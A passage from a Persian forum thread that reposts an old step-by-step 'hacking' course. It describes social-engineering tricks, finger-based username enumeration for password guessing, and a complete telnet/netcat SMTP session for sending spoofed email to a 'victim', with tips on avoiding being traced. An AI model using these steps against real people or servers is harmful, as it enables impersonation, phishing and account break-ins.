دراينجا می‌خواهم تعدادی از تکنيک‌های Social Endineering را براتون بگم.البته توجه کنيد که اگرچه اين روش‌ها اطلاعات فنی زيادی نمی‌خواد ولیمعمولا نتايج خوبی داره. و نيز بگم که اين روش‌ها خيلی گسترده است و هربار به شکلی بروز می‌کند. اما نکته مشترکی که من در همه‌شان ديدم اينه کههميشه از شما می‌خواهند که پسوردتان را يک جايی وارد کنيد و اين دقيقامحلی است که فرق شما رو با يک user معمولی نشون ميده. زيرا نبايد گولبخوريد (-;

۱- تلفن زدن :
يکی از روش‌های مهندسی اجتماعی است.هکر اطلاعاتي از افراد يک شرکت جمع‌آوری می‌کند و بعد با شرکت تماس گرفتهو مثلا از فلان فرد می‌خواهد که پسورد را عوض کند. پيشرفته‌ترين متد‌هایاين نوع هک توسط مشهورترين (و يکی از بهترين) هکرهای تاريخ، Kevin Mitnick اجرا شده است.

۲- مخ زدن برای ارسال فايل:
مثلابا يک نفر چت می‌کنيد و می‌گيد که بيا عکس منو ببين! و به جای ارسال يکفايل تصويری، يک فايل اجرايی مثلا تروجان براش می‌فرستيد. تا اين مرحلهکار شما به عنوان مهندسی اجتماعی است ولی مابقی (مثلا استفاده از تروجانفرستاده شده) ديگه Social engineering نيست.

۳- برای ما E-mail بزنيد و ما پسورد E-mail کسی که شما می‌خواهيد را براتون پيدا می‌کنيم:
ممکنه در اينترنت به اين نوع پيغام‌ها برخورد کرده‌ايد که مثلا می‌گويد:
"به ما ايميل بزنيد، در سطر اول E-mail کسی که می‌خواهيد ما براتون هک کنيمرو بنويسيد، در سطر دوم E-mail خودتون رو، سطر آخر هم پسورد E-mail خودتونرو. ما پسورد E-mail ی که در سطر اول مشخص کرديد براتون می‌فرستيم. "
ممکنهعجيب به نظر برسه ولی خيلی‌ها به همين راحتی هک می‌شوند. اين ديگه از اونبهتريناش، چون يک تيره و سه نشون. ۲ تا آدرس E-mail برای فرستادن تبليغاتو نيز پسورد E-mail خودتون.

۴- فايل ضميمه (attached) به E-mail را باز کنيد:
مثلااينکه می‌گويد در اين E-mail عکس من attach شده است باز کنيد و ببينيد.درحالی که فايل attach شده فايل تصويری نيست، بلکه يک فايل آلوده است.

۵- ساختن يک صفحه شبيه به سايت‌های مشهور و درخواست login :
مثلا ساختن يک صفحه شبيه به ياهو برای login درحالی‌که اين صفحه برای دزديدن id و password شماست.
منبع
http://www.vispar.ir

uody
7th February 2011, 11:47 AM
قسمت 12وم هم برای شما
بقیه قسمت ها با چند روز تاخیر براتون خواهم گذاشت

آموزش قدم به قدم هک قسمت12
موضوع:کار با پورت ها7&13
- شروع کار با پورت‌ها

الانبه جايی رسيده‌ايم که می‌توانيم بحث پورت‌ها را شروع کنيم. اولين نکته‌ایکه بايد بگم اين است که ابزاری که به کمک آن با پورت‌ها صحبت می‌کنيم درهمه پورت‌ها يکی است ولی هر پورتی زبان مخصوص خود دارد (درست مثل زبان‌هایمختلف در جهان که همشون از طريق زبان و دهان ادا می‌شن ولی هر کدام روشخاصی برای ارتباط برقرار کردن دارند). پس ما برای کار با پورت‌ها بايدزبان هرکدام را ياد بگيريم.
بحث بعدی اين است که وقتی می‌گيم يه پورتبازه بايد توجه کنيد که برنامه‌ای روی آن کامپيوتر نصب شده و اون پورت راباز کرده است (پورت‌ها خود به خود باز نمی‌شوند). يک سری پورت‌ها توسط خودسيستم‌عامل باز می‌شوند (يعنی به محض نصب سيستم‌عامل که خودش هم درواقع يهنرم‌افزاره) و نيازی نيست که برنامه ديگری برايش نصب کنيم. در مقابل، بعضیپورت‌های ديگر توسط برنامه‌های جانبی باز می‌شوند.
به عنوان مثال وقتیمی‌گم که پورت ۲۵ روی يک ip باز است، اين معنی را دارد که برنامه‌ای رویاون کامپيوتر خاص وجود دارد که پورت ۲۵ را باز کرده و من وقتی از طريقکامپيوتر خودم با آن پورت کار می‌کنم در واقع دارم با آن برنامه خاص (کهاون پورت را باز کرده) صحبت می‌کنم.
حالا يه سوال پيش می‌آد که چرا اصلا يه نرم‌افزار بايد پورت باز کنه و اينکه کدام نرم‌افزارها بايد پورت باز کنند؟
جواباين است که هر برنامه‌ای که بخواهد از طريق شبکه (يعنی از راه دور اصطلاحاremote) قابل دسترس باشه بايد يه پورت باز کنه. پس يک برنامه‌ای که نيازیبه برقراری ارتباط شبکه‌ای ندارد (مثلا يه نرم‌افزار گرافيکی) نبايد ونشايد که پورت باز کند.

بايد ببينيم که از طريق چه برنامه‌ای می‌توان با پورت‌ها صحبت کرد ( البته با هرکدام به روش خودشان )؟
برایاين‌کار از دو نرم‌افزار به نام‌های telnet و nc استفاده می‌کنيم. telnetکه در خود سيستم‌عامل وجود دارد و nc را هم که جلسه قبل داون‌لود کرديم.
حالا چگونه از اين دو نرم‌افزارها می‌توان استفاده کنيم؟
۱- استفاده از telnet :
اگر بخواهيم با ip ای به شماره 194.225.184.13 از طريق پورت 25 صحبت کنيم بايد بنويسيم:
telnet 194.225.184.13 25
و بعد اينکه ارتباط برقرار شد بايد شروع کنيم و از طريق زبان پورت ۲۵ با آن صحبت کنيم.
۲- استفاده از nc :
اگر بخواهيم همان کار را با netcat انجام دهيم، بايد بنويسيم:
nc -v 194.225.184.13 25
و بعد از برقراری ارتباط شروع به صحبت کنيم.


- با پورت ۱۳ صحبت کنيم

نامديگر اون daytime است و کارش هم اينه که زمان و تاريخ رو در اون کامپيوتربه ما می‌ده. اين پورت اصولا خيلی سر راسته. فقط کافيه که بهش وصل شيم تااطلاعاتشون بيرون بريزه. البته اين پورت رو خيلی از کامپيوترها بسته است.(يادتون باشه که وقتی می‌توان با يه پورت کار کرد که باز باشد).
حالا می‌خوايم با پورت ۱۳ از ip شماره 194.225.184.13 صحبت کنم. يکی از اين دو دستور را می‌نويسم:
telnet 194.225.184.13 13
nc -v 194.225.184.13 13
البته در آن دستورات به جای عدد ۱۳ می‌توان معادلش را نوشت که daytime است.
و جواب می‌شنوم:
11:35:33 AM 10/5/2002
بله،با اين پورت ارتباط برقرار کرديم و اطلاعاتش رو دريافت کرديم. اين اطلاعاتمعمولا به درد اين می‌خورد که مکان جغرافيايی اون کامپيوتر را حدس بزنيم(البته اگر زمان اون کامپيوتر صحيح باشد). به عنوان مثال اين کامپيوتر خاصدر ايران است چون ساعتش همزمان با ايران است.


- با پورت ۷ صحبت کنيم

اسماين پورت echo است. من اين پورت رو پورت ميمون می‌گم چون هرچی که شما براشبنويسيد را تقليد می‌کنه و همان‌ها را براتون پس می‌فرستد. مثلا من بهپورت ۷ کامپيوتری با ip شماره 194.225.184.13 تلنت يا nc می‌کنم.
telnet 194.225.184.13 7
nc -v 194.225.184.13 7بعداز برقراری ارتباط، هر چی من بنويسم، اون برام پس می‌فرسته. مثلا اگه تايپکنم Ali1000 و Enter بزنيم، جواب می‌شنوم، Ali1000 ... خودتون امتحان کنيدتا ببينيد. برای تمام شدن کار بايد دکمه Ctrl+C را فشار دهيم تا اين ميمونبازی تموم بشه.
پس کار کردن با اين پورت هم زياد سخت نيست.

uody
14th February 2011, 12:11 AM
بعد از یه مدت تاخیر ..........

قسمت 13 رو به شما دوستان تقدیم میکنم

آموزش قدم به قدم هک قسمت 13
موضوع :پورت 79
- پورت ۷۹ چيست؟

پورت۷۹ را پورت finger مي‌گويند. کاربرد اين پورت به اوايل ايجاد اينترنتبر‌مي‌گرده و کاربردش مخصوص سيستم‌عامل يونيکس بوده‌است (الان هم تقريبافقط در خانواده سيستم‌های يونيکس اين پورت قابل استفاده است).
وقتي اينپورت روی سيستم‌عامل يونيکس باز باشه، مي‌شه با يک request ساده فهميد کهاز بين کساني که در آن سيستم account دارند، کدام‌ها on هستند (يعنيکدام‌ها به سيستم login شده‌اند). برنامه‌اي که پورت ۷۹ رو در يک سيستمباز مي‌کنه، finger server مي‌گن و چون مختص سيستم‌عامل يونيکس است،مي‌تونين از عبارت Finger Deamon استفاده کنين. حالا که پورت ۷۹ روي سيستمباز شد، شما مي‌تونين با اون ارتباط برقرار کنين.


- با پورت ۷۹ صحبت کنيم

همان‌طورکه مي‌دانيد، براي صحبت کردن با پورت‌ها از دو برنامه telnet و nc ميشهاستفاده کرد. در مورد پورت ۷۹ يه نرم‌افزار ديگر به نام finger در تمامسيستم‌عامل‌های يونيکس و برخي سيستم‌عامل‌هاي ويندوز وجود دارد که علاوهبر دو برنامه قبلي، اونم مي‌شه به کار برد.
فرض کنيد که مي‌خوام باپورت ۷۹ در کامپيوتری به اسم router2.iums.ac.ir ارتباط برقرا کنم. برایاين‌ کار يکي از سه دستور زير را استفاده مي‌کنم:
telnet router2.iums.ac.ir 79
nc -v router2.iums.ac.ir 79
finger .@router2.iums.ac.ir
دقتکنيد که در دو دستور اول شماره پورت مشخص شده ولي دستور آخري نه، چوندستور finger فقط براي همين‌کار استفاده مي‌شه و نمي‌توان باهاش با پورتديگه‌ای ارتباط برقرار کرد. ضمنا به ساختار دستور آخر توجه کنيد. بعد ازاجرای دستور، جواب مي‌شنوم:
Line User Host(s) Idle Location
33 tty 33 whgh Async interface 0
34 tty 34 najahan Async interface 0
35 tty 35 sadf Async interface 0
36 tty 36 abokho Async interface 0
38 tty 38 whgh Async interface 0
39 tty 39 bzamani Async interface 0
40 tty 40 saeedmah Async interface 0
41 tty 41 mfaizi Async interface 0
42 tty 42 gourabi Async interface 0
43 tty 43 farhadz Async interface 0
44 tty 44 arbks Async interface 0
45 tty 45 mhalavi Async interface 0
46 tty 46 farhood Async interface 0
47 tty 47 staavoni Async interface 0
48 tty 48 whgh Async interface 0
* 66 vty 0 idle 0 217.218.84.58

Interface User Mode Idle Peer Addressنکتهمهم اين است که اطلاعاتي که به کمک پورت ۷۹ به دست مي‌آد، خيلي بستگي بهسروري داره که اين اطلاعات رو مي‌فرسته. بعضي از سيستم‌ها علاوه بر نامافراد (username) که در اين مثال ديده مي‌شه، نام و نام خانوادگي افراد،ساعت و محل login کردن و ... را نمايش مي‌دهند. اما چيزي که هميشه وجوددارد و مشترک است، username هاست که از نقطه نظر يک هکر بسيار ارزشمنداست. در اين مثال ما اکانت‌هايي به اسم najahan ،whgh و ... در اين سروروجود دارد و افراد مربوطه در حال حاضر login کرده‌اند. اگر اکانتي موجودباشد ولي فرد مورد نظر در حال حاضر از آن اکانت وارد نشده باشد، نمايشداده نمي‌شود. اين ليست فقط براي اکانت‌های فعال است. پس نتايجي که شما درارتباط با اين سرور کسب مي‌کنيد، با نتايجي که من نوشتم متفاوت خواهد بود.


- اين اطلاعات به چه دردي مي‌خورد؟

اولاينو بگم که finger کردن، جزئي از مراحل Enumeration است (البته در حالتکاربرد legal يا قانوني). منظور از عبارت Enumeration يا به طور خلاصهEnum، پيدا کردن ليست کاربران است.
+ فرض کنيد مي‌خواهيد يک ليست ازپسورد‌ها را تست کنيد تا اينکه يکي شانسي درست در بياد (درست مثل دزدها کهيه سري کليد را تست مي‌کنن که يکي به قفل بخوره و باز کنه!) حالا سوالاينه که اين پسورد‌ها رو برای چه username ي تست مي‌کنيد؟ جواب، usernameهايي است که با Enumeration به دست اومده است. پس اول با Enumeration يهليست پيدا مي‌کنيد و بعد تعداد زيادی پسورد رو روش تست مي‌کنيد (روش اينکارو بعدا مي‌گم).
+ کاربرد بعدی finger در رابطه با يک سري اکانت‌هايخاص است. من هميشه وقتي به يک اکانت به اسم guest برخورد مي‌کنم، هميشهپسوردهای guest يا libguest يا myguest و ... رو تست مي‌کنم که گاهي جوابميده. همين‌طور در مورد اکانتي به اسم demo پسورد demo را تست مي‌کنم و... معمولا موسسات بزرگ پر است از اين username هاي عمومي که حدس زدنپسورد مربوطه کار مشکلي نيست.
+ گفتم که بعضي سرورهاي finger نام ونام‌خانوادگي افراد را هم برايمان مي‌فرستند. چون بعضي از افراد متاسفانهيا خوشبختانه از اين اطلاعات براي پسوردشون استفاده مي‌کنند، مي‌تونه مفيدباشه.
+ يک کاربرد ديگه و البته بسيار مهم موقعي است که مثلا مي‌خواهيديک سري پسورد رو روي يک اکانت خاص تست کنيد. من هميشه اول يک fingerمي‌کنم که مطمئن بشم که فرد در حال حاضر login نکرده باشد و بعد اين کاررو شروع مي‌کنم ( يعني انقدر صبر مي‌کنم که ديگه آن اسم خاص در fingerنمايش داده نشه يعني طرف مقابل logout کرده باشد!)
+ بازم يهکاربرد‌هاي مهم ديگه هست که الان بهتون نمي‌گم تا تو خماريش بمونين ! شوخيکردم، وقتي بحث پورت‌ها تموم شد و رسيديم به کاربرد‌هاي غير معمول اينپورت‌ها، براتون حتما مي‌گم.

uody
15th February 2011, 09:51 AM
قسمت 14م هم برا تو دوست گرامی ام

آموزش قدم به قدم هک قسمت 14
موضوع:پورت 80
- پورت ۸۰ چيست؟

پورت۸۰ يکی از مهم‌ترين پورت‌هاست. دنيای وب (صفحات اينترنتی) بر اساس همينپورت کار می‌کنه. توضيح اينکه وقتی به يه سايت وصل می‌شيم و صفحه وب رادرخواست می‌کنيم، در واقع مرورگر اينترنتی به پورت ۸۰ اون کامپيوتر وصلمی‌شه و اطلاعات رو می‌گيره (البته بعد از گرفتن اطلاعات اون رو تفسيرمی‌کنه و به صورت يه صفحه نشون می‌ده - دقت کنيد که اطلاعات در واقع بهصورت يک سری تگ HTML است ).


- با پورت ۸۰ صحبت کنيم

حالا ما می‌خواهيم با پورت ۸۰ يک کامپيوتر صحبت کنيم ولی به کمک telnet و nc.
اول بايد يه connection (اتصال) با پورت ۸۰ برقرار کنيم (مثلا برای سايت hotmail.com بايد بنويسم):
telnet http://www.hotmail.com 80
nc -v http://www.hotmail.com 80
پس اول بايد يکی از دستورات بالا را استفاده کنيم. من هميشه توصيه‌ام استفاده از nc بوده و خواهد بود.
حالابايد شروع به صحبت با پورت ۸۰ کنيم. من فعلا دو تا جمله براتون می‌گم وبقيه‌اش بمونه واسه بعد. دقت کنيد که موقع کار با پورت ۸۰ با تلنت (نه nc)دستوراتی که ما می‌نويسيم، نمايش داده نمی‌شود ولی کار می‌کنه.
۱- اولين جمله اينه: GET / HTTP/1.0 و بعدش دوتا Enter
بهفاصله‌ها دقت کنيد. دو طرف / ی که بعد از GET است، فاصله وجود دارد. اينجمله به پورت ۸۰ می‌گه که هرچی در header داره، نشون بده. و جواب می‌شنوم:
HTTP/1.0 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Thu, 05 Dec 2002 12:02:51 GMT
Location: http://lc2.law5.hotmail.passport.com/cgi-bin/login
X-Cache: MISS from cache5.neda.net.ir
Connection: close

۲- دومين جمله اينه: GET / what/ever و بعدش دوتا Enter
به فاصله‌ها دقت کنيد. اين دستور باعث ميشه که هر چی داره، رو کنه.

البته توجه کنيد که ما مسير را مشخص نکرديم. اين حالت که بدون مسير است خيلی وقت‌ها کار نمی‌کنه (مثل همين مثال !!)


گاهیپيش می‌آد که يک سری دستورات خاص را هميشه بايد پشت‌ سرهم به يه پورت خاصبفرستيم و بخواهيم در وقت صرفه‌جويی کنيم. مثلا همين جمله GET / HTTP/1.0و دو Enter پشت سرهم که هميشه استفاده می‌کنيم. در اين موارد می‌توان ايندستورات را در يک فايل تايپ کرد (همراه با Enter ها که بايد موقع نوشتنحتما بزنيد) و بعد مثلا با نام ali.txt ذخيره کنيد و بعد يکی از دستوراتزير را بنويسيم:
nc -v http://www.far30.com 80 < ali.txt
type ali.txt | nc -v http://www.far30.com 80
که همان کارهای بالايی را انجام ميده.


- حالا مي‌خوام مسير رو مشخص کنم

مثلافرض کنيد که مي‌خوام فايلي به اسم index.html را از مسير startup در سايتيبه اسم http://www.site.com داون‌لود کنيم. اول يه nc مي‌کنيم به سايت. بعدمي‌نويسيم:
GET /startup/index.html HTTP/1.0
بعد دو تا Enter مي‌زنيم.
اينمثال نشون ميده که چطوري مسير رو ميشه مشخص کرد. همين کار رو مي‌تونيمبراي فايل‌هايي مثل فايل‌هاي گرافيکي و ... انجام بديم و حتي مي‌تونيداطلاعاتي که مي‌رسه رو در يک فايل ذخيره کنيد. براي اين‌کار مي‌نويسيد:
nc -v http://www.site.com 80 > index.html
(اينکاري که کرديم با موردي که در بالا نوشتيم فرق مي‌کنه! در بالا دستوراتGET رو تو يه فايل مي‌نوشتيم و مي‌فرستاديم که اجرا بشه ولي الان داريمنتايجي که بر مي‌گرده رو در يک فايل ذخيره مي‌کنيم!) ميشه اين دوتا روترکيب کرد مثلا نوشت:
nc -v http://www.site.com 80 < dastoorat.txt > index.html

uody
16th February 2011, 09:54 AM
دوستان عزیز به قسمت 15 توجه کنید

آموزش قدم به قدم هک قسمت 15
موضوع:پورت 25
- خلاصه پروتکل‌های مرتبط با E-mail

۱- SMTP :
رويپورت ۲۵ اجرا مي‌شد. از اين پروتکل براي ارسال E-mail استفاده می‌شود. اينپروتکل امروزه ديگه براي خوندن E-mail استفاده نمي‌شه. اين پروتکل بحثامروز ماست.

۲- POP3 :
اين پروتکل را روي پورت ۱۱۰ بحث مي‌کنيم و از آن براي خواندن E-mail هاي رسيده استفاده مي‌کنيم.

۳- IMAP :
اينپروتکل به عنوان جايگزيني براي پروتکل POP3 به‌کار ميره. از نظر ساختاريکمي با پروتکل POP3 متفاوت است ولي کارش همان است و براي خواندن E-mailهاي رسيده به کار مي‌رود.

+ Web-based Email: يک روش ديگه برايدسترسي به E-mail وجود دارد و آن استفاده از امکانات وب براي خواندن وفرستادن E-mail است. وقتي شما از خود سايت yahoo يا hotmail براي کار باE-mail استفاده مي‌کنيد، در واقع همين روش را به کار مي‌بريد. نکته قابلتوجه آن است که اين روش کند‌تر از استفاده مستقيم از پروتکل‌هاست.


- پورت ۲۵ چيست؟

پورت۲۵ براي ارسال E-mail به‌کار مي‌رود. اين پورت از پروتکل SMTP برای اينکار استفاده مي‌کند. نکته مهم آن است که اين پروتکل توانايي خواندن E-mailرا ندارد و فقط مي‌تواند E-mail بفرستد.
حالا سوالي که پيش مي‌آيد که چه برنامه‌هايي روی سرور پورت ۲۵ را باز مي‌کند؟
همان‌طورکه گفتم، SMTP فقط يک پروتکل است (نه يک برنامه) و از نظر لغوی مخفف عبارتSimple Mail Transfer Protocol است. برنامه‌ای که پورت ۲۵ را باز مي‌کندتا بتوان از طريق آن E-mail ارسال کنيم، SMTP Server مي‌گويند. SMTPServer يک عبارت کلي است، برای اين نوع برنامه‌ها. حالا خود SMTP Serverانواع مختلف دارد که مشهورترين‌هايشان، SMail، SendMail، ESMTP MAILService و ... هستند. نکته مهم اين است که تفاوت زيادی نيست که سرور موردنظر ما از کداميک از اين نرم‌افزارها استفاده مي‌کند، زيرا اصول کار باآنها يکي است.
برای صحبت کردن با پورت ۲۵ اول بايد يک Server پيدا کنيمکه پورت ۲۵ در آن باز باشد (اگرچه در اکثر سرورها پورت ۲۵ باز است). بعدبايد طبق معمول از telnet يا nc براي ارتباط استفاده کنيم.
پورت ۲۵ از ديدگاه يک هکر چه کاربردی دارد؟
يکهکر از پورت ۲۵ برای ارسال Fake Mail (ميل ناشناس، ميل تقلبي) استفادهمي‌کند. دليل آن است که درصد بسيار بالايي از SMTP Server ها اهميتينمي‌دهند که شما کي هستيد و به کي می‌خواهيد ميل بزنيد، بلکه فقط کار خودرا مي‌کنند.


- چگونه يک SMTP سرور پيدا کنيم

پيداکردن SMTP سرور کار سختي نيست. اگرچه از اکثر SMTP Server ها مي‌توان بههر کسي E-mail زد ولي من هميشه توصيه مي‌کنم از SMTP Server ی استفادهکنيد که مربوط به به Mail Box قرباني است. برای مثال فرض کنيد کهمي‌خواهيد به کسي fake mail بزنيد و اون شخص mail box اش در ياهو است. دراين حالت من ترجيح مي‌دم که از SMTP Server های سرور ياهو استفاده کنم (اگرچه از هر سرور ديگری برای اين کار مي‌تونم استفاده کنم ).
اگرچهما عبارت fake mail (ناشناس) برای اين نوع E-mail ها استفاده مي‌کنيم وليبايد توجه کنيد که در مواردی خاص مي‌شود شما را رديابي کرد. به عنوان مثالip شما از مواردی است که همراه با E-mail ارسال مي‌شود. پس در انتخاب SMTPServer بايد دقت کرد (بعضي SMTP Server ها هستند که حتي ip شما را ارسالنمي‌کنند و اين يعني نهايت ناشناسي).
نکته بعدی اين است که بعضي SMTPServer ها يه کم باهوش عمل مي‌کنند به طوری که در نهايت E-mail ارساليحداقل برای اشخاص حرفه‌ای ماهيتش (fake بودن) قابل تشخيص خواهد بود (يعنيمي‌فهمند که اين يک fake mail است نه يه E-mail واقعي). پس اين هم درانتخاب SMTP Server مهم است که بايد از SMTP Server هايي استفاده کنيم کهدر نهايت حماقت باشند!
بازم يه نکته ديگه، SMTP Server در نهايت روی يکسرور قرار دارد پس در نهايت آدرس آن چيزی مثل mail.far30.com،mx01.hotmail.com و ... خواهد بود.
حالا که معيارهای مهم برای انتخاب SMTP Server را شناختيم، حالا وقتش است که عملا يه SMTP Server پيدا کنيم:
۱- يکي از ساده‌ترين راه‌ها استفاده از سايت‌هايي مثل google است که با جستجوی عبارت SMTP Server هزاران سرور پيدا کنيم.
۲- استفاده از SMTP Server سايت دانشگاه‌ها. تجربه برام ثابت کرده که اين روش يکي از بهترين‌هاست.
۳- استفاده از يک سری SMTP Server های مشهور. اين روش هم بد نيست.

حالا روش را عملا نشونتون مي‌دم:
اولبايد يک سرور را مشخص کنيد که از طريق آن مي‌خواهيد fake mail را بفرستيد.همان‌طور که قبلا گفتم اگر مثلا مي‌خواهيد برای يه نفر که mail box او درياهو است، fake mail بزنيد، سرور را همان سرور در نظر بگيريد يعني از خودyahoo.com برای ارسال استفاده کنيد.
بعد بايد ببينيد که در اين سرورکدام subdomain بايد استفاده کنيد (يعني اينکه SMTP Server سرور آدرسش،mail.yahoo.com است يا mx.yahoo.com است يا چيز ديگر). برای اين کار دوروش را مي‌گم:
۱- از nslookup استفاده کنيم:
با nslookup قبلا آشناشده‌ايد. اول بايد با whois يک name server پيدا مي‌کرديم و بعد از طريقآن سايت را nslookup مي‌کرديم (اگر فراموش کرده‌ايد، درس ۵ و ۶ را دوبارهبخوانيد. مثلا مي‌خواهم SMTP Server مربوط به far30.com را پيدا کنم. اوليک whois مي‌کنم و مي‌بينم که name server سايت، s1.sazin.com وs2.sazin.com است. حالا nslookup مي‌کنم و آن سطر هايي را مي‌خوانم که بانام MX مشخص شده است و ۲ تا آدرس مي‌بينم که عبارتند از far30.com وmail.far30.com پس SMTP Server های سايت far30.com همين دو آدرس است. درنتيجه اگر بخواهم از سايت far30.com برای ارسال fake mail استفاده کنم، ازاين آدرس‌ها بايد بهره‌ گيرم.
۲- استفاده از بعضي سايت‌های خاص:
يکي از اين سايت‌ها http://www.mob.net/~ted/tools/mx.php3 است. در اين سايت، نام سايت را مي‌نويسيد و دکمه lookup را کليک مي‌کنيد. مثلا من نوشتم yahoo.com و به نتايج زير رسيدم:
Domain Server: ns.mob.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.

Domain Server: ns.cw.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.

...

مشخص است که SMTP Server های سايت yahoo.com عبارتند از: mx1.mail.yahoo.com , mx2.mail.yahoo.com , mx4.mail.yahoo.com
اگرچه اين روش راحت‌تر به نظر مي‌رسد ولي شما را يه انسان مصرفي بار مي‌آورد نه خلاق !


- با پورت ۲۵ صحبت کنيم

حالا که SMTP Server دارم مي‌تونم fake mail بزنم.
بهعنوان مثال مي‌خواهم به آدرس target@yahoo.com يک fake mail بزنم که شخصفکر کند که Email از آدرس me@hotmal.com آمده است. (دقت کنيد که اين آدرسهر چيزی مي‌تواند باشد. مثلا مي‌توانيد از طرف Bill Gates به يه نفرE-mail بزنيد). و مي‌خواهم Subject آن باشد: arze salam و متن پيغام اينباشد: bah bah sam aleikum
برای اين کار :
۱- چون mail box قربانيدر سايت ياهو است، پس من هم بهتر است از SMTP Server خود ياهو استفاده کنم(بهتر است ولي اجباری در آن نيست). SMTP Server های ياهو را در قسمت قبليبه دست آوردم. مثلا از mx1.mail.yahoo.com استفاده مي‌کنم.
۲- بايد ازtelnet يا nc برای برقراری ارتباط استفاده کنم. الان مي‌خوام از telnetاستفاده کنم. پس بايد دستور زير را به‌کار برم (دقت کنيد که از اسم SMTPSerevr استفاده کردم).
telnet mx1.mail.yahoo.com 25
بعد از تايپ دستور، صفحه پاک مي‌شود و جواب مي‌گيرم:
220 YSmtp mta499.mail.yahoo.com ESMTP service ready
۳-حالا دستور زير را مي‌نويسم. دقت کنيد که چون از telnet استفاده مي‌کنيد،چيزهايي را که تايپ مي‌کنيد، نمي‌بينيد و اينکه نمي‌تونيد از دکمهBackSpace استفاده کنيد (پس در تايپ‌کردن دقت کنيد!):
HELO yahoo.com
ايندستور يعني من از کجا هستم (يعني شما که مي‌خواهيد ميل بزنيد، کي هستيد).اينجا من گفتم که من از سايت yahoo.com هستم!! معمولا مهم نيست که جلویعبارت HELO نام چه سايتي را بنويسيد چون اکثرا چک نمي‌شود. و جوابمي‌شنوم:
250 mta499.mail.yahoo.com
۴- حالا بايد مشخص کنم که E-mail فرستنده (يعني من) چيست. چون مي‌خواهم E-mail از طرف me@hotmail.com به نظر بيايد، مي‌نويسم:
MAIL FROM:
و جواب مي‌گيرم:
250 sender ok
۵- حالا بايد بگم که اين E-mail به چه آدرس ارسال شود که در اين مثال، target@yahoo.com است. بايد بنويسم:
RCPT TO:
و جواب مي‌شنوم:
250 recipient ok
۶- حالا بايد بنويسم،
DATA
و Enter بزنم و جواب مي‌شنوم:
354 go ahead
اينجا وقت تايپ کردن يک سری چيز‌های اساسي است. اول مي‌نويسم،
From: abbas akbari
اين همان اسمي است که به عنوان Sender يا همان From ديده خواهد شد. من‌ خواستم که به اسم abbas akbari ديده شود. حالا مي‌نويسم:
Subject: arze salam
اين هم در آن E-mail به عنوان subject خواهد بود. حالا موارد زير را مي‌نويسم (که اختياري است):
MIME-Version: 1.0
Content-Type: text/plain;
و بعد دوتا !! Enter زده و متن نامه را مي‌نويسم:
bah bah
sam aleikum
.
دقتکنيد که يک کاراکتر . (نقطه) در سطر آخر نوشتم و بعد Enter زدم. با اينروش به پورت ۲۵ حالي مي‌کنم که متن نامه تمام شده‌است و نامه ارسال شود.متعاقبا پيغامي مي‌گيرم که بيانگر ارسال E-mail است.
250 ok dirdel
۷- مي‌نويسم:
QUIT
تا ارتباط قطع شود و از telnet خارج بشم.

اول توصيه مي‌کنم که يک fake mail واسه خودتون بفرستيد تا ماهيت fake mail را درک کنيد.
مسئلهبعدی آن است که در قسمتي target@yahoo.com نوشته شده است، شما بايد اينسطر را تغيير داده و E-mail قرباني خودتان در ياهو را بنويسيد!


- همان کار با nc

برای انجام اين کار با nc اول همان دستورات بالا را در فايلي مثلا به اسم fake.txt مي‌نويسيم :
HELO yahoo.com
MAIL FROM:
RCPT TO:
DATA
From: abbas akbari
Subject: arze salam
MIME-Version: 1.0
Content-Type: text/plain;

bah bah
sam aleikum
.
QUIT
حالا فايل را ذخيره کرده و از دستور زير استفاده مي‌کنم:
nc -v mx1.mail.yahoo.com 25 < fake.txt
همين!


- Fake mail در صندوق پستي به چه شکلي ظاهر مي‌شود؟

اين قسمت رو در مورد mail box های yahoo و hotmail توضيح مي‌دم.

اينکهاين نوع E-mail ها به چه شکلي ظاهر مي‌شود، بستگي به اين دارد که تنظيماتmail box قرباني در چه حالتي تنظيم شده باشد. در حالت معمول فقط تعدادی ازheader ها نمايش داده مي‌شود. در اين حالت معمولا fake mail مثل يک E-mailمعمولي ديده مي‌شود.
From: "abbas akbari"
Subject: arze salam

bah bah
sam aleikum
در mail box ها مي‌توان تنظيمات را طوری انجام داد که تمام header ها نمايش داده شوند.
برایاينکار در yahoo از منويي که بالای صفحه است، منوی Mail را باز کرده وگزينه Options را کليک مي‌کنيم. در صفحه‌ای که مي‌آيد، روی گزينه GeneralPreferences کليک کنيد. در صفحه‌ای که مي‌آيد، از قسمت Message در قسمتHeaders گزينه ... Show all را انتخاب مي‌کنيم و دکمه Save را از پايينصفحه کليک مي‌کنيم. حالا همان ميل را دوباره باز مي‌کنم و مشاهده مي‌کنمکه به شکل زير ظاهر مي‌شود:
From abbas akbari Mon Jan 6 05:56:37 2003
X-Apparently-To: ali1000vali2000@yahoo.com via 216.136.129.53; 06
Jan 2003 05:56:37 -0800 (PST)
Return-Path:
Received: from 217.218.84.27 (HELO yahoo.com) (217.218.84.27) by
mta576.mail.yahoo.com with SMTP; 06 Jan 2003 05:56:37 -0800 (PST)
From: "abbas akbari"
Subject: arze salam
MIME-Version: 1.0
Content-Type: text/plain;
Content-Length: 19

bah bah
sam aleikum
در اين حالت مي‌توانيد ip ارسال کننده را هم ببينيد. (سعي کنيد که هميشه تنظيمات yahoo mailbox تان به اين شکل باشد)

uody
16th February 2011, 04:05 PM
دوستان میدونم فردا نمیتونم قسمت بعدیش رو ارسال کنم برا همین امروز براتون میزارم
اینم قسمت16م
آموزش قدم به قدم هک قسمت 16
موضوع:پورت110
- پورت ۱۱۰ چيست؟

